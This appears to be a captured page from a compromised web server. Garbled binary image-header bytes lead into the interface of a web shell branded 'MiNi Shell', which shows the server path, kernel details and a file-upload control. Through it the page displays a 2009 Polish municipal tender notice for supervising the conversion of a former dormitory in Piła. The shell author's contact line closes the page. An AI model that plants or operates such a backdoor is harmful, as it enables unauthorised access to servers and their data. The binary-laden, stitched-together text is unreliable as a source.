JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090904/148189-N-2009.html

<p class="kh_header"><b>Piła: Budynek po byłym internacie zespołu szkół gastronomicznych przy ul.Boh. Stalingradu 23 w Pile - przebudowa i adaptacja na obiekt wielofunkcyjny- nadzór inwestorski nad robotami</b><br>
<b>Numer ogłoszenia: 148189 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budynek po byłym internacie zespołu szkół gastronomicznych przy ul.Boh. Stalingradu 23 w Pile - przebudowa i adaptacja na obiekt wielofunkcyjny- nadzór inwestorski nad robotami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budynek po byłym internacie zespołu szkół gastronomicznych 
przy ul.Boh. Stalingradu 23 w Pile - przebudowa i adaptacja na obiekt wielofunkcyjny- nadzór inwestorski nad robotami.
2. Główny przedmiot: CPV 74264100 Usługi zarządzania projektami budowlanymi
3. Opis planowanych robót budowlanych:
Zagospodarowanie terenu:
układ komunikacji samochodowej i pieszej, z dojazdami do czterech miejsc postojowych, z dojściami do dobudowanej klatki schodowej
śmietnik zlokalizowany przy wjeździe na teren działki 69/6
teren zabawowy dla przedszkola(piaskownica, zjeżdżalnia, huśtawki, przeplotnia i ławki) wraz z ogrodzeniemprzyłącza wod.-kan.usuniecie istniejących ścian pochylni prowadzącej do piwnicy, wystających ponad poziom terenu i pochylnię, zasypanie gruntem do poziomu projektowanego i ułożenie nawierzchni utwardzonej; usunięcie istniejącego wyłazu od strony podwórza i wyrównanie terenu pod nową awierzchnię
zejście do piwnicy schodami na gruncie, od strony podwórzapochylnia dla osób niepełnosprawnych przy wejściu głównym do budynku.
Powierzchnia w granicach dzialek-1555,00m2;pow. w granicach opracowania 1765,13 m2;
pow. zabudowy istniejącej 571,35 m2; pow. zabudowy projektowanej 603,15m2;
Budynek byłego internatu ZSG w Pile(architektura-konstrukcja)
Parter-przedszkole II oddziałowe z kuchnią i częścią administracyjną wraz z technologią kuchni oraz dźwigiem towarowymPiętro I-Centrum Aktywizacji Osób Starszych i Niepełnosprawnych z pomieszczeniami rehabilitacyjnymi, gabinetem lekarskim, salami terapii i poradnictwa psychologicznego i prawnego oraz z niezbędnymi sanitariatami i szatniamiPiętro II i IV-część mieszkalna w zakresie usług udostępniania pokoi rotacyjnych wraz z sanitariatami, kuchniami, pralniami i suszarniami, dla osób wychodzących z nałogów i dla osób z przemocą w rodzinie; pomieszczenia świetlic dla mieszkańcówPiętro III-pomieszczenia biurowe oddane pod użytek MOPS; przy pomieszczeniach biurowych znajduje się również sala wielofunkcyjna, wraz z sanitariatami i aneksem kuchennym, z przeznaczeniem do ewentualnych imprez okolicznościowych Budynek jest przystosowany do korzystania z niego osobom niepełnosprawnym -dżwig hydrauliczny (komunikacja pionowa), pochylnia oraz odpowiednie szerokości drzwi bez progów, wraz z sanitariatami.
Powierzchnia zabudowy istniejącej-571,35m2; powierzchnia zabudowy projektowanej-603,15m2; Powierzchnia całkowita netto istniejąca-2630,69m2;powierzchnia całkowita netto projektowana-2709,60m2;kubatura istniejąca-10192,39m3; kubatura projektowana-10666,54m3.
Budynek byłego internatu ZSG w Pile(branża sanitarna)
1.kanalizacja sanitarna
2.instalacja zimnej i ciepłej wody użytkowej
3.instalacja grzewcza
4.instalacja wentylacji
Dokumentacja projektowo-kosztorysowa branży sanitarnej przewiduje budowę nowych instalacji sanitarnych wymienionych wyżej oraz demontaż ,wywóz i utylizacja istniejących, których stan techniczny uniemożliwia ich dalszą eksploatację.
Budynek byłego internatu ZSG w Pile(branża elektryczna)
Dokumentacja projektowo-kosztorysowa branży elektrycznej przewiduje budowę nowych instalacji oraz demontaż, wywóz i utylizacja istniejących, których stan techniczny uniemożliwia ich dalszą eksploatację.
zasilanie i tablice rozdzielcze
instalacja oświetleniowa
instalacja gniazd wtyczkowych
instalacja zasilania urządzeń technologicznych i wentylacji
instalacja odgromowa i ochrony przepięciowej
instalacja ochrony od porażeń
instalacje teletechniczne
instalacja telefoniczna
instalacja komputerowa
instalacja wykrywania i sygnalizacji pożaru
instalacja RTV.
 Roboty budowlane realizowane będą na podstawie dokumentacji technicznej oraz posiadanego przez Zamawiającego pozwolenia na budowę
Zakres obowiązków i czynności Wykonawcy:
1) pełnienie nadzoru inwestorskiego zgodnie z obowiazujacym polskim Prawem budowlanymi
2) zapoznanie się z dokumentacją techniczną inwestycji
3) nadzór i kontrola nad właściwym i terminowym wdrażaniem inwestycji
4) reprezentowanie interesów Zamawiajacego na budowie w zakresie spraw technicznych i ekonomicznych w ramach dokumentacji projektowej, prawa budowlanego oraz umowy  na realizację inwestycji
5) wspieranie Zamawiającego we wszystkich czynnościach technicznych, administracyjnych  i finansowych związanych z realizacją przedsięwzięcia
6) monitorowanie postępu prac, włącznie ze składaniem okresowych raportów je określających  w których będą wziete pod uwagę zarówno wskaźniki fizyczne jak i finansowe
7) zabezpieczenie profesjonalnego i kompletnego nadzoru inwestorskiego nad prowadzonymi  robotami
8) zapewnienie dyspozycyjności na budowie
9) zapewnienie pełnej obsługi sprawdzającej ( geodezyjnej, rozliczeniowej)
10) współpraca z nadzorem autorskim
11) nadzór i akceptacja przeprowadzonych pomiarów i uruchomień systemu monitoringu
12) zapewnienie zgodności wykonywanych robót z technicznymi i umownymi wymaganiami  wykonania robót
13) rozwiązywanie bieżących problemów technicznych w trakcie realizacji zadania
14) rzeczowe i finansowe rozliczenie robót budowlanych
15) zachowanie poufności informacji
16) zatwierdzanie rysunków zamiennych i uzupełniających wykonanych w ramach nadzoru  autorskiego
17) kontrola i nadzór nad zgodnością realizacji robót z odpowiednimi wymaganiami bezpieczeństwa i ochrony zdrowia, bezpieczeństwa przeciwpożarowego, przepisów  związanych z ochroną środowiska
18) zatwierdzanie i kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami i specyfikacją techniczną
19) szacowanie i weryfikowanie robót dodatkowych zaproponowanych przez Wykonawcę  w zakresie wartości fizycznych i finansowych
20) uzgadnianie z Zamawiającym wszelkich zmian dotyczących wartości robót
21) sporządzanie protokołów konieczności w przypadku potrzeby wykonania robót dodatkowych  lub zamiennych, uzasadnienie konieczności wykonania tych prac oraz wnioskowanie do  Zamawiającego o ich wykonanie
22)sprawdzanie ilości i jakości wykonywanych robót, dokonywanie odbiorów częściowych, dokonywanie odbioru robót zanikających i ulegających zakryciu  
23) weryfikacja rysunków powykonawczych, robót zinwentaryzowanych na geodezyjnych  mapach  powykonawczych dostarczonych przez wykonawcę robót 
24) przygotowanie dokumentów wymaganych do zgłoszenia zakończenia budowy do organu  nadzoru budowlanego i uzyskanie pozwolenia na użytkowanie 
25) organizacja oraz przeprowadzenie odbiorów częściowych, końcowych i ostatecznego tj.podjęcie wszelkich niezbędnych czynności dla prawidłowego przeprowadzenia odbiorów,  łącznie z powołaniem komisji odbiorowych oraz przygotowaniem protokołów odbioru w porozumieniu z Zamawiajacym
26) rozliczanie wykonawcy pod względem rzeczowym I fanonsowym 
27) ocenianie i rozstrzyganie wszelkich roszczeń, związanych z realizacją umowy na roboty  budowlane, problemów powstałych podczas robot, zapobieganie sporom i opóźnieniom,  gdy jest to wykonalne
28) organizowanie i uczestnictwo w przeglądach gwarancyjnych z wykonawcą robót( minimum  raz w roku) - po zakończeniu robót ( okres gwarancji na roboty budowlane - 36 miesięcy  od daty odbioru końcowego)
29) każdorazowe uczestnictwo w przeglądach w przypadku pojawienia się wad, zgłaszanych  Wykonawcy robót
30) uczestnictwo w rozwiązywaniu sporów wynikłych na tle realizacji umowy o roboty  budowlane w okresie gwarancyjnym
31) zarekomendowanie zwrotu zobowiązań wynikających z umowy z Wykonawcą robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.41.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają   obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniana potencjału technicznego i osób zdolnych do wykonywania zamówienia;
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie art.  24 ust. 1 i 2ustawy Prawo Zamówień Publicznych
5.dysponują  osobami posiadającymi doświadczenie  i  kwalifikacje oraz uprawnienia budowlane odpowiednie do przedmiotu zamówienia:
a) inspektor nadzoru z uprawnieniami budowlanymi nieograniczonymi w specjalności konstrukcyjno- budowlanej, minimum. 8 lat doświadczenia  zawodowego w pełnieniu samodzielnej funkcji technicznej ( po uzyskaniu uprawnień budowlanych) w kierowaniu budową, robotami branżowymi lub w nadzorze inwestorskim w danej branży,
 b) inspektor nadzoru z uprawnieniami budowlanymi nieograniczonymi o specjalności instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych, posiadający  co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji  technicznej ( po uzyskaniu uprawnień budowlanych) w kierowaniu budową, robotami branżowymi lub w nadzorze inwestorskim w danej branży
c) inspektor nadzoru z uprawnieniami budowlanymi nieograniczonymi o specjalności instalacyjno-inżynieryjnej w zakresie sieci i instalacji elektrycznych, posiadający  co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnej funkcji  technicznej ( po uzyskaniu uprawnień budowlanych) w kierowaniu budową, robotami branżowymi lub w nadzorze inwestorskim w danej branży
W przypadku podmiotów składających wspólną ofertę warunki wyszczególnione w pkt 1 i 4 muszą spełniać wszyscy wykonawcy, pozostałe warunki wykonawcy muszą spełniać łącznie.
 
 
Uwaga:
 Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Ofertę na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. Nr 1
2.Oświadczenie o treści określonej w art.22 ust. 1  - Prawo zamówień publicznych -  wg wzoru  określonego w załączniku Nr 2. 
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
W przypadku zaświadczenia o wpisie do ewidencji działalności    gospodarczej oznacza to, że powinno być wydane w trybie opisanym w dziale VII  Kodeksu Postępowania Administracyjnego- samo stwierdzenie przez organ zgodności  z oryginałem z podaniem daty-nie spełnia wymogów ustawy( nie jest wydaniem  zaświadczenia)  
4. Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć
w wykonywaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych ,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu
wykonywanych przez nich  czynności (załącznik nr 4);
Do wykazu należy dołączyć kopie uprawnień potwierdzających kwalifikacje niezbędne do wykonania przedmiotu zamówienia wraz z aktualnym wpisem do właściwej Izby Inż. Bud.
4a. Pisemne zobowiązanie innych podmiotów do udostępniane osób zdolnych do wykonania
zamówienia,  jeżeli w wykazie, o którym mowa w pkt. 5 wykonawca wskazał soby, którymi
będzie dysponował.
5. Parafowany projekt umowy jako akceptacja jej treści i warunków.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pila.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.um.pila.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 10:00, miejsce: siedziba Zamawiającego pok. 136  pietro I.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com